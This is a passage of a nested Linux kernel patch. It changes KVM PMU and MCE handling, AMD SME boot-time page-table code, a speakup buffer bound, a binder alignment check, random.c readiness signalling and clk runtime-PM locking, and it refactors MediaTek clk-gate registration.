++		 *    adaptive PEBS enabled and MSR_PEBS_DATA_CFG.LBRS=1.
++		 *
++		 * 4. Document which PMU events are effectively exposed to the
++		 *    guest via adaptive PEBS, and make adaptive PEBS mutually
++		 *    exclusive with KVM_SET_PMU_EVENT_FILTER if necessary.
++		 */
++		perf_cap &= ~PERF_CAP_PEBS_BASELINE;
+ 	}
+ 
+ 	return perf_cap;
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f724765032bc4..a2ea636a23086 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -3278,7 +3278,7 @@ static bool is_mci_status_msr(u32 msr)
+ static bool can_set_mci_status(struct kvm_vcpu *vcpu)
+ {
+ 	/* McStatusWrEn enabled? */
+-	if (guest_cpuid_is_amd_or_hygon(vcpu))
++	if (guest_cpuid_is_amd_compatible(vcpu))
+ 		return !!(vcpu->arch.msr_hwcr & BIT_ULL(18));
+ 
+ 	return false;
+diff --git a/arch/x86/mm/mem_encrypt_boot.S b/arch/x86/mm/mem_encrypt_boot.S
+index 9de3d900bc927..e25288ee33c2d 100644
+--- a/arch/x86/mm/mem_encrypt_boot.S
++++ b/arch/x86/mm/mem_encrypt_boot.S
+@@ -26,7 +26,7 @@ SYM_FUNC_START(sme_encrypt_execute)
+ 	 *   RCX - virtual address of the encryption workarea, including:
+ 	 *     - stack page (PAGE_SIZE)
+ 	 *     - encryption routine page (PAGE_SIZE)
+-	 *     - intermediate copy buffer (PMD_PAGE_SIZE)
++	 *     - intermediate copy buffer (PMD_SIZE)
+ 	 *    R8 - physical address of the pagetables to use for encryption
+ 	 */
+ 
+@@ -123,7 +123,7 @@ SYM_FUNC_START(__enc_copy)
+ 	wbinvd				/* Invalidate any cache entries */
+ 
+ 	/* Copy/encrypt up to 2MB at a time */
+-	movq	$PMD_PAGE_SIZE, %r12
++	movq	$PMD_SIZE, %r12
+ 1:
+ 	cmpq	%r12, %r9
+ 	jnb	2f
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index 06ccbd36e8dcd..f176098848749 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -41,6 +41,7 @@
+ #include <linux/mem_encrypt.h>
+ #include <linux/cc_platform.h>
+ 
++#include <asm/init.h>
+ #include <asm/setup.h>
+ #include <asm/sections.h>
+ #include <asm/cmdline.h>
+@@ -93,12 +94,12 @@ struct sme_populate_pgd_data {
+  * section is 2MB aligned to allow for simple pagetable setup using only
+  * PMD entries (see vmlinux.lds.S).
+  */
+-static char sme_workarea[2 * PMD_PAGE_SIZE] __section(".init.scratch");
++static char sme_workarea[2 * PMD_SIZE] __section(".init.scratch");
+ 
+ static char sme_cmdline_arg[] __initdata = "mem_encrypt";
+ static char sme_cmdline_on[]  __initdata = "on";
+ 
+-static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
++static void __head sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	unsigned long pgd_start, pgd_end, pgd_size;
+ 	pgd_t *pgd_p;
+@@ -113,7 +114,7 @@ static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ 	memset(pgd_p, 0, pgd_size);
+ }
+ 
+-static pud_t __init *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
++static pud_t __head *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	pgd_t *pgd;
+ 	p4d_t *p4d;
+@@ -150,7 +151,7 @@ static pud_t __init *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
+ 	return pud;
+ }
+ 
+-static void __init sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
++static void __head sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
+ {
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+@@ -166,7 +167,7 @@ static void __init sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
+ 	set_pmd(pmd, __pmd(ppd->paddr | ppd->pmd_flags));
+ }
+ 
+-static void __init sme_populate_pgd(struct sme_populate_pgd_data *ppd)
++static void __head sme_populate_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+@@ -192,17 +193,17 @@ static void __init sme_populate_pgd(struct sme_populate_pgd_data *ppd)
+ 		set_pte(pte, __pte(ppd->paddr | ppd->pte_flags));
+ }
+ 
+-static void __init __sme_map_range_pmd(struct sme_populate_pgd_data *ppd)
++static void __head __sme_map_range_pmd(struct sme_populate_pgd_data *ppd)
+ {
+ 	while (ppd->vaddr < ppd->vaddr_end) {
+ 		sme_populate_pgd_large(ppd);
+ 
+-		ppd->vaddr += PMD_PAGE_SIZE;
+-		ppd->paddr += PMD_PAGE_SIZE;
++		ppd->vaddr += PMD_SIZE;
++		ppd->paddr += PMD_SIZE;
+ 	}
+ }
+ 
+-static void __init __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
++static void __head __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
+ {
+ 	while (ppd->vaddr < ppd->vaddr_end) {
+ 		sme_populate_pgd(ppd);
+@@ -212,7 +213,7 @@ static void __init __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
+ 	}
+ }
+ 
+-static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
++static void __head __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 				   pmdval_t pmd_flags, pteval_t pte_flags)
+ {
+ 	unsigned long vaddr_end;
+@@ -224,11 +225,11 @@ static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 	vaddr_end = ppd->vaddr_end;
+ 
+ 	/* If start is not 2MB aligned, create PTE entries */
+-	ppd->vaddr_end = ALIGN(ppd->vaddr, PMD_PAGE_SIZE);
++	ppd->vaddr_end = ALIGN(ppd->vaddr, PMD_SIZE);
+ 	__sme_map_range_pte(ppd);
+ 
+ 	/* Create PMD entries */
+-	ppd->vaddr_end = vaddr_end & PMD_PAGE_MASK;
++	ppd->vaddr_end = vaddr_end & PMD_MASK;
+ 	__sme_map_range_pmd(ppd);
+ 
+ 	/* If end is not 2MB aligned, create PTE entries */
+@@ -236,22 +237,22 @@ static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 	__sme_map_range_pte(ppd);
+ }
+ 
+-static void __init sme_map_range_encrypted(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_encrypted(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_ENC, PTE_FLAGS_ENC);
+ }
+ 
+-static void __init sme_map_range_decrypted(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_decrypted(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_DEC, PTE_FLAGS_DEC);
+ }
+ 
+-static void __init sme_map_range_decrypted_wp(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_decrypted_wp(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_DEC_WP, PTE_FLAGS_DEC_WP);
+ }
+ 
+-static unsigned long __init sme_pgtable_calc(unsigned long len)
++static unsigned long __head sme_pgtable_calc(unsigned long len)
+ {
+ 	unsigned long entries = 0, tables = 0;
+ 
+@@ -288,7 +289,7 @@ static unsigned long __init sme_pgtable_calc(unsigned long len)
+ 	return entries + tables;
+ }
+ 
+-void __init sme_encrypt_kernel(struct boot_params *bp)
++void __head sme_encrypt_kernel(struct boot_params *bp)
+ {
+ 	unsigned long workarea_start, workarea_end, workarea_len;
+ 	unsigned long execute_start, execute_end, execute_len;
+@@ -323,9 +324,8 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 *     memory from being cached.
+ 	 */
+ 
+-	/* Physical addresses gives us the identity mapped virtual addresses */
+-	kernel_start = __pa_symbol(_text);
+-	kernel_end = ALIGN(__pa_symbol(_end), PMD_PAGE_SIZE);
++	kernel_start = (unsigned long)RIP_REL_REF(_text);
++	kernel_end = ALIGN((unsigned long)RIP_REL_REF(_end), PMD_SIZE);
+ 	kernel_len = kernel_end - kernel_start;
+ 
+ 	initrd_start = 0;
+@@ -342,25 +342,17 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	}
+ #endif
+ 
+-	/*
+-	 * We're running identity mapped, so we must obtain the address to the
+-	 * SME encryption workarea using rip-relative addressing.
+-	 */
+-	asm ("lea sme_workarea(%%rip), %0"
+-	     : "=r" (workarea_start)
+-	     : "p" (sme_workarea));
+-
+ 	/*
+ 	 * Calculate required number of workarea bytes needed:
+ 	 *   executable encryption area size:
+ 	 *     stack page (PAGE_SIZE)
+ 	 *     encryption routine page (PAGE_SIZE)
+-	 *     intermediate copy buffer (PMD_PAGE_SIZE)
++	 *     intermediate copy buffer (PMD_SIZE)
+ 	 *   pagetable structures for the encryption of the kernel
+ 	 *   pagetable structures for workarea (in case not currently mapped)
+ 	 */
+-	execute_start = workarea_start;
+-	execute_end = execute_start + (PAGE_SIZE * 2) + PMD_PAGE_SIZE;
++	execute_start = workarea_start = (unsigned long)RIP_REL_REF(sme_workarea);
++	execute_end = execute_start + (PAGE_SIZE * 2) + PMD_SIZE;
+ 	execute_len = execute_end - execute_start;
+ 
+ 	/*
+@@ -383,7 +375,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 * before it is mapped.
+ 	 */
+ 	workarea_len = execute_len + pgtable_area_len;
+-	workarea_end = ALIGN(workarea_start + workarea_len, PMD_PAGE_SIZE);
++	workarea_end = ALIGN(workarea_start + workarea_len, PMD_SIZE);
+ 
+ 	/*
+ 	 * Set the address to the start of where newly created pagetable
+@@ -502,7 +494,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	native_write_cr3(__native_read_cr3());
+ }
+ 
+-void __init sme_enable(struct boot_params *bp)
++void __head sme_enable(struct boot_params *bp)
+ {
+ 	const char *cmdline_ptr, *cmdline_arg, *cmdline_on;
+ 	unsigned int eax, ebx, ecx, edx;
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 5f0ce77a259d8..68d4f328f1696 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -747,11 +747,11 @@ phys_addr_t slow_virt_to_phys(void *__virt_addr)
+ 	switch (level) {
+ 	case PG_LEVEL_1G:
+ 		phys_addr = (phys_addr_t)pud_pfn(*(pud_t *)pte) << PAGE_SHIFT;
+-		offset = virt_addr & ~PUD_PAGE_MASK;
++		offset = virt_addr & ~PUD_MASK;
+ 		break;
+ 	case PG_LEVEL_2M:
+ 		phys_addr = (phys_addr_t)pmd_pfn(*(pmd_t *)pte) << PAGE_SHIFT;
+-		offset = virt_addr & ~PMD_PAGE_MASK;
++		offset = virt_addr & ~PMD_MASK;
+ 		break;
+ 	default:
+ 		phys_addr = (phys_addr_t)pte_pfn(*pte) << PAGE_SHIFT;
+@@ -1041,7 +1041,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	case PG_LEVEL_1G:
+ 		ref_prot = pud_pgprot(*(pud_t *)kpte);
+ 		ref_pfn = pud_pfn(*(pud_t *)kpte);
+-		pfninc = PMD_PAGE_SIZE >> PAGE_SHIFT;
++		pfninc = PMD_SIZE >> PAGE_SHIFT;
+ 		lpaddr = address & PUD_MASK;
+ 		lpinc = PMD_SIZE;
+ 		/*
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index ffe3b3a087fea..78414c6d1b5ed 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -592,7 +592,7 @@ static void pti_set_kernel_image_nonglobal(void)
+ 	 * of the image.
+ 	 */
+ 	unsigned long start = PFN_ALIGN(_text);
+-	unsigned long end = ALIGN((unsigned long)_end, PMD_PAGE_SIZE);
++	unsigned long end = ALIGN((unsigned long)_end, PMD_SIZE);
+ 
+ 	/*
+ 	 * This clears _PAGE_GLOBAL from the entire kernel image.
+diff --git a/drivers/accessibility/speakup/main.c b/drivers/accessibility/speakup/main.c
+index 73db0cb44fc7b..45d906f17ea3d 100644
+--- a/drivers/accessibility/speakup/main.c
++++ b/drivers/accessibility/speakup/main.c
+@@ -573,7 +573,7 @@ static u_long get_word(struct vc_data *vc)
+ 	}
+ 	attr_ch = get_char(vc, (u_short *)tmp_pos, &spk_attr);
+ 	buf[cnt++] = attr_ch;
+-	while (tmpx < vc->vc_cols - 1) {
++	while (tmpx < vc->vc_cols - 1 && cnt < sizeof(buf) - 1) {
+ 		tmp_pos += 2;
+ 		tmpx++;
+ 		ch = get_char(vc, (u_short *)tmp_pos, &temp);
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 55cd17a13e758..8c2b7c074eca1 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -1707,8 +1707,10 @@ static size_t binder_get_object(struct binder_proc *proc,
+ 	size_t object_size = 0;
+ 
+ 	read_size = min_t(size_t, sizeof(*object), buffer->data_size - offset);
+-	if (offset > buffer->data_size || read_size < sizeof(*hdr))
++	if (offset > buffer->data_size || read_size < sizeof(*hdr) ||
++	    !IS_ALIGNED(offset, sizeof(u32)))
+ 		return 0;
++
+ 	if (u) {
+ 		if (copy_from_user(object, u + offset, read_size))
+ 			return 0;
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index 5d1c8e1c99b5b..fd57eb372d492 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -683,7 +683,7 @@ static void extract_entropy(void *buf, size_t len)
+ 
+ static void __cold _credit_init_bits(size_t bits)
+ {
+-	static struct execute_work set_ready;
++	static DECLARE_WORK(set_ready, crng_set_ready);
+ 	unsigned int new, orig, add;
+ 	unsigned long flags;
+ 
+@@ -699,8 +699,8 @@ static void __cold _credit_init_bits(size_t bits)
+ 
+ 	if (orig < POOL_READY_BITS && new >= POOL_READY_BITS) {
+ 		crng_reseed(); /* Sets crng_init to CRNG_READY under base_crng.lock. */
+-		if (static_key_initialized)
+-			execute_in_process_context(crng_set_ready, &set_ready);
++		if (static_key_initialized && system_unbound_wq)
++			queue_work(system_unbound_wq, &set_ready);
+ 		wake_up_interruptible(&crng_init_wait);
+ 		kill_fasync(&fasync, SIGIO, POLL_IN);
+ 		pr_notice("crng init done\n");
+@@ -870,8 +870,8 @@ void __init random_init(void)
+ 
+ 	/*
+ 	 * If we were initialized by the cpu or bootloader before jump labels
+-	 * are initialized, then we should enable the static branch here, where
+-	 * it's guaranteed that jump labels have been initialized.
++	 * or workqueues are initialized, then we should enable the static
++	 * branch here, where it's guaranteed that these have been initialized.
+ 	 */
+ 	if (!static_branch_likely(&crng_is_ready) && crng_init >= CRNG_READY)
+ 		crng_set_ready(NULL);
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 9004e07182259..fe1d45eac837c 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -37,6 +37,10 @@ static HLIST_HEAD(clk_root_list);
+ static HLIST_HEAD(clk_orphan_list);
+ static LIST_HEAD(clk_notifier_list);
+ 
++/* List of registered clks that use runtime PM */
++static HLIST_HEAD(clk_rpm_list);
++static DEFINE_MUTEX(clk_rpm_list_lock);
++
+ static const struct hlist_head *all_lists[] = {
+ 	&clk_root_list,
+ 	&clk_orphan_list,
+@@ -59,6 +63,7 @@ struct clk_core {
+ 	struct clk_hw		*hw;
+ 	struct module		*owner;
+ 	struct device		*dev;
++	struct hlist_node	rpm_node;
+ 	struct device_node	*of_node;
+ 	struct clk_core		*parent;
+ 	struct clk_parent_map	*parents;
+@@ -122,6 +127,89 @@ static void clk_pm_runtime_put(struct clk_core *core)
+ 	pm_runtime_put_sync(core->dev);
+ }
+ 
++/**
++ * clk_pm_runtime_get_all() - Runtime "get" all clk provider devices
++ *
++ * Call clk_pm_runtime_get() on all runtime PM enabled clks in the clk tree so
++ * that disabling unused clks avoids a deadlock where a device is runtime PM
++ * resuming/suspending and the runtime PM callback is trying to grab the
++ * prepare_lock for something like clk_prepare_enable() while
++ * clk_disable_unused_subtree() holds the prepare_lock and is trying to runtime
++ * PM resume/suspend the device as well.
++ *
++ * Context: Acquires the 'clk_rpm_list_lock' and returns with the lock held on
++ * success. Otherwise the lock is released on failure.
++ *
++ * Return: 0 on success, negative errno otherwise.
++ */
++static int clk_pm_runtime_get_all(void)
++{
++	int ret;
++	struct clk_core *core, *failed;
++
++	/*
++	 * Grab the list lock to prevent any new clks from being registered
++	 * or unregistered until clk_pm_runtime_put_all().
++	 */
++	mutex_lock(&clk_rpm_list_lock);
++
++	/*
++	 * Runtime PM "get" all the devices that are needed for the clks
++	 * currently registered. Do this without holding the prepare_lock, to
++	 * avoid the deadlock.
++	 */
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node) {
++		ret = clk_pm_runtime_get(core);
++		if (ret) {
++			failed = core;
++			pr_err("clk: Failed to runtime PM get '%s' for clk '%s'\n",
++			       dev_name(failed->dev), failed->name);
++			goto err;
++		}
++	}
++
++	return 0;
++
++err:
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node) {
++		if (core == failed)
++			break;
++
++		clk_pm_runtime_put(core);
++	}
++	mutex_unlock(&clk_rpm_list_lock);
++
++	return ret;
++}
++
++/**
++ * clk_pm_runtime_put_all() - Runtime "put" all clk provider devices
++ *
++ * Put the runtime PM references taken in clk_pm_runtime_get_all() and release
++ * the 'clk_rpm_list_lock'.
++ */
++static void clk_pm_runtime_put_all(void)
++{
++	struct clk_core *core;
++
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node)
++		clk_pm_runtime_put(core);
++	mutex_unlock(&clk_rpm_list_lock);
++}
++
++static void clk_pm_runtime_init(struct clk_core *core)
++{
++	struct device *dev = core->dev;
++
++	if (dev && pm_runtime_enabled(dev)) {
++		core->rpm_enabled = true;
++
++		mutex_lock(&clk_rpm_list_lock);
++		hlist_add_head(&core->rpm_node, &clk_rpm_list);
++		mutex_unlock(&clk_rpm_list_lock);
++	}
++}
++
+ /***           locking             ***/
+ static void clk_prepare_lock(void)
+ {
+@@ -1310,9 +1398,6 @@ static void __init clk_unprepare_unused_subtree(struct clk_core *core)
+ 	if (core->flags & CLK_IGNORE_UNUSED)
+ 		return;
+ 
+-	if (clk_pm_runtime_get(core))
+-		return;
+-
+ 	if (clk_core_is_prepared(core)) {
+ 		trace_clk_unprepare(core);
+ 		if (core->ops->unprepare_unused)
+@@ -1321,8 +1406,6 @@ static void __init clk_unprepare_unused_subtree(struct clk_core *core)
+ 			core->ops->unprepare(core->hw);
+ 		trace_clk_unprepare_complete(core);
+ 	}
+-
+-	clk_pm_runtime_put(core);
+ }
+ 
+ static void __init clk_disable_unused_subtree(struct clk_core *core)
+@@ -1338,9 +1421,6 @@ static void __init clk_disable_unused_subtree(struct clk_core *core)
+ 	if (core->flags & CLK_OPS_PARENT_ENABLE)
+ 		clk_core_prepare_enable(core->parent);
+ 
+-	if (clk_pm_runtime_get(core))
+-		goto unprepare_out;
+-
+ 	flags = clk_enable_lock();
+ 
+ 	if (core->enable_count)
+@@ -1365,8 +1445,6 @@ static void __init clk_disable_unused_subtree(struct clk_core *core)
+ 
+ unlock_out:
+ 	clk_enable_unlock(flags);
+-	clk_pm_runtime_put(core);
+-unprepare_out:
+ 	if (core->flags & CLK_OPS_PARENT_ENABLE)
+ 		clk_core_disable_unprepare(core->parent);
+ }
+@@ -1382,12 +1460,22 @@ __setup("clk_ignore_unused", clk_ignore_unused_setup);
+ static int __init clk_disable_unused(void)
+ {
+ 	struct clk_core *core;
++	int ret;
+ 
+ 	if (clk_ignore_unused) {
+ 		pr_warn("clk: Not disabling unused clocks\n");
+ 		return 0;
+ 	}
+ 
++	pr_info("clk: Disabling unused clocks\n");
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
++	/*
++	 * Grab the prepare lock to keep the clk topology stable while iterating
++	 * over clks.
++	 */
+ 	clk_prepare_lock();
+ 
+ 	hlist_for_each_entry(core, &clk_root_list, child_node)
+@@ -1404,6 +1492,8 @@ static int __init clk_disable_unused(void)
+ 
+ 	clk_prepare_unlock();
+ 
++	clk_pm_runtime_put_all();
++
+ 	return 0;
+ }
+ late_initcall_sync(clk_disable_unused);
+@@ -3115,28 +3205,41 @@ static void clk_summary_show_one(struct seq_file *s, struct clk_core *c,
+ 				 int level)
+ {
+ 	int phase;
++	struct clk *clk_user;
++	int multi_node = 0;
+ 
+-	seq_printf(s, "%*s%-*s %7d %8d %8d %11lu %10lu ",
++	seq_printf(s, "%*s%-*s %-7d %-8d %-8d %-11lu %-10lu ",
+ 		   level * 3 + 1, "",
+-		   30 - level * 3, c->name,
++		   35 - level * 3, c->name,
+ 		   c->enable_count, c->prepare_count, c->protect_count,
+ 		   clk_core_get_rate_recalc(c),
+ 		   clk_core_get_accuracy_recalc(c));
+ 
+ 	phase = clk_core_get_phase(c);
+ 	if (phase >= 0)
+-		seq_printf(s, "%5d", phase);
++		seq_printf(s, "%-5d", phase);
+ 	else
+ 		seq_puts(s, "-----");
+ 
+-	seq_printf(s, " %6d", clk_core_get_scaled_duty_cycle(c, 100000));
++	seq_printf(s, " %-6d", clk_core_get_scaled_duty_cycle(c, 100000));
+ 
+ 	if (c->ops->is_enabled)
+-		seq_printf(s, " %9c\n", clk_core_is_enabled(c) ? 'Y' : 'N');
++		seq_printf(s, " %5c ", clk_core_is_enabled(c) ? 'Y' : 'N');
+ 	else if (!c->ops->enable)
+-		seq_printf(s, " %9c\n", 'Y');
++		seq_printf(s, " %5c ", 'Y');
+ 	else
+-		seq_printf(s, " %9c\n", '?');
++		seq_printf(s, " %5c ", '?');
++
++	hlist_for_each_entry(clk_user, &c->clks, clks_node) {
++		seq_printf(s, "%*s%-*s  %-25s\n",
++			   level * 3 + 2 + 105 * multi_node, "",
++			   30,
++			   clk_user->dev_id ? clk_user->dev_id : "deviceless",
++			   clk_user->con_id ? clk_user->con_id : "no_connection_id");
++
++		multi_node = 1;
++	}
++
+ }
+ 
+ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
+@@ -3144,9 +3247,7 @@ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
+ {
+ 	struct clk_core *child;
+ 
+-	clk_pm_runtime_get(c);
+ 	clk_summary_show_one(s, c, level);
+-	clk_pm_runtime_put(c);
+ 
+ 	hlist_for_each_entry(child, &c->children, child_node)
+ 		clk_summary_show_subtree(s, child, level + 1);
+@@ -3155,11 +3256,16 @@ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
+ static int clk_summary_show(struct seq_file *s, void *data)
+ {
+ 	struct clk_core *c;
+-	struct hlist_head **lists = (struct hlist_head **)s->private;
++	struct hlist_head **lists = s->private;
++	int ret;
+ 
+-	seq_puts(s, "                                 enable  prepare  protect                                duty  hardware\n");
+-	seq_puts(s, "   clock                          count    count    count        rate   accuracy phase  cycle    enable\n");
+-	seq_puts(s, "-------------------------------------------------------------------------------------------------------\n");
++	seq_puts(s, "                                 enable  prepare  protect                                duty  hardware                            connection\n");
++	seq_puts(s, "   clock                          count    count    count        rate   accuracy phase  cycle    enable   consumer                         id\n");
++	seq_puts(s, "---------------------------------------------------------------------------------------------------------------------------------------------\n");
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
+ 
+ 	clk_prepare_lock();
+ 
+@@ -3168,6 +3274,7 @@ static int clk_summary_show(struct seq_file *s, void *data)
+ 			clk_summary_show_subtree(s, c, 0);
+ 
+ 	clk_prepare_unlock();
++	clk_pm_runtime_put_all();
+ 
+ 	return 0;
+ }
+@@ -3214,9 +3321,15 @@ static int clk_dump_show(struct seq_file *s, void *data)
+ {
+ 	struct clk_core *c;
+ 	bool first_node = true;
+-	struct hlist_head **lists = (struct hlist_head **)s->private;
++	struct hlist_head **lists = s->private;
++	int ret;
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
+ 
+ 	seq_putc(s, '{');
++
+ 	clk_prepare_lock();
+ 
+ 	for (; *lists; lists++) {
+@@ -3229,6 +3342,7 @@ static int clk_dump_show(struct seq_file *s, void *data)
+ 	}
+ 
+ 	clk_prepare_unlock();
++	clk_pm_runtime_put_all();
+ 
+ 	seq_puts(s, "}\n");
+ 	return 0;
+@@ -3836,8 +3950,6 @@ static int __clk_core_init(struct clk_core *core)
+ 	}
+ 
+ 	clk_core_reparent_orphans_nolock();
+-
+-	kref_init(&core->ref);
+ out:
+ 	clk_pm_runtime_put(core);
+ unlock:
+@@ -4066,6 +4178,22 @@ static void clk_core_free_parent_map(struct clk_core *core)
+ 	kfree(core->parents);
+ }
+ 
++/* Free memory allocated for a struct clk_core */
++static void __clk_release(struct kref *ref)
++{
++	struct clk_core *core = container_of(ref, struct clk_core, ref);
++
++	if (core->rpm_enabled) {
++		mutex_lock(&clk_rpm_list_lock);
++		hlist_del(&core->rpm_node);
++		mutex_unlock(&clk_rpm_list_lock);
++	}
++
++	clk_core_free_parent_map(core);
++	kfree_const(core->name);
++	kfree(core);
++}
++
+ static struct clk *
+ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ {
+@@ -4086,6 +4214,8 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 		goto fail_out;
+ 	}
+ 
++	kref_init(&core->ref);
++
+ 	core->name = kstrdup_const(init->name, GFP_KERNEL);
+ 	if (!core->name) {
+ 		ret = -ENOMEM;
+@@ -4098,9 +4228,8 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 	}
+ 	core->ops = init->ops;
+ 
+-	if (dev && pm_runtime_enabled(dev))
+-		core->rpm_enabled = true;
+ 	core->dev = dev;
++	clk_pm_runtime_init(core);
+ 	core->of_node = np;
+ 	if (dev && dev->driver)
+ 		core->owner = dev->driver->owner;
+@@ -4140,12 +4269,10 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 	hw->clk = NULL;
+ 
+ fail_create_clk:
+-	clk_core_free_parent_map(core);
+ fail_parents:
+ fail_ops:
+-	kfree_const(core->name);
+ fail_name:
+-	kfree(core);
++	kref_put(&core->ref, __clk_release);
+ fail_out:
+ 	return ERR_PTR(ret);
+ }
+@@ -4225,18 +4352,6 @@ int of_clk_hw_register(struct device_node *node, struct clk_hw *hw)
+ }
+ EXPORT_SYMBOL_GPL(of_clk_hw_register);
+ 
+-/* Free memory allocated for a clock. */
+-static void __clk_release(struct kref *ref)
+-{
+-	struct clk_core *core = container_of(ref, struct clk_core, ref);
+-
+-	lockdep_assert_held(&prepare_lock);
+-
+-	clk_core_free_parent_map(core);
+-	kfree_const(core->name);
+-	kfree(core);
+-}
+-
+ /*
+  * Empty clk_ops for unregistered clocks. These are used temporarily
+  * after clk_unregister() was called on a clock and until last clock
+diff --git a/drivers/clk/mediatek/clk-gate.c b/drivers/clk/mediatek/clk-gate.c
+index 0c867136e49d7..67d9e741c5e73 100644
+--- a/drivers/clk/mediatek/clk-gate.c
++++ b/drivers/clk/mediatek/clk-gate.c
+@@ -152,12 +152,12 @@ const struct clk_ops mtk_clk_gate_ops_no_setclr_inv = {
+ };
+ EXPORT_SYMBOL_GPL(mtk_clk_gate_ops_no_setclr_inv);
+ 
+-static struct clk_hw *mtk_clk_register_gate(const char *name,
++static struct clk_hw *mtk_clk_register_gate(struct device *dev, const char *name,
+ 					 const char *parent_name,
+ 					 struct regmap *regmap, int set_ofs,
+ 					 int clr_ofs, int sta_ofs, u8 bit,
+ 					 const struct clk_ops *ops,
+-					 unsigned long flags, struct device *dev)
++					 unsigned long flags)
+ {
+ 	struct mtk_clk_gate *cg;
+ 	int ret;
+@@ -202,10 +202,9 @@ static void mtk_clk_unregister_gate(struct clk_hw *hw)
+ 	kfree(cg);
+ }
+ 
+-int mtk_clk_register_gates_with_dev(struct device_node *node,
+-				    const struct mtk_gate *clks, int num,
+-				    struct clk_hw_onecell_data *clk_data,
+-				    struct device *dev)
++int mtk_clk_register_gates(struct device *dev, struct device_node *node,
++			   const struct mtk_gate *clks, int num,
++			   struct clk_hw_onecell_data *clk_data)
+ {
+ 	int i;
+ 	struct clk_hw *hw;
+@@ -229,13 +228,13 @@ int mtk_clk_register_gates_with_dev(struct device_node *node,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_gate(gate->name, gate->parent_name,
++		hw = mtk_clk_register_gate(dev, gate->name, gate->parent_name,
+ 					    regmap,
+ 					    gate->regs->set_ofs,
+ 					    gate->regs->clr_ofs,
+ 					    gate->regs->sta_ofs,
+ 					    gate->shift, gate->ops,
+-					    gate->flags, dev);
++					    gate->flags);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", gate->name,
+@@ -261,14 +260,6 @@ int mtk_clk_register_gates_with_dev(struct device_node *node,
+ 
+ 	return PTR_ERR(hw);
+ }
+-EXPORT_SYMBOL_GPL(mtk_clk_register_gates_with_dev);
+-
+-int mtk_clk_register_gates(struct device_node *node,
+-			   const struct mtk_gate *clks, int num,
+-			   struct clk_hw_onecell_data *clk_data)
+-{
+-	return mtk_clk_register_gates_with_dev(node, clks, num, clk_data, NULL);
+-}
+ EXPORT_SYMBOL_GPL(mtk_clk_register_gates);
+ 
+ void mtk_clk_unregister_gates(const struct mtk_gate *clks, int num,
+diff --git a/drivers/clk/mediatek/clk-gate.h b/drivers/clk/mediatek/clk-gate.h
+index d9897ef535284..1a46b4c56fc5d 100644
+--- a/drivers/clk/mediatek/clk-gate.h
++++ b/drivers/clk/mediatek/clk-gate.h
+@@ -50,15 +50,10 @@ struct mtk_gate {
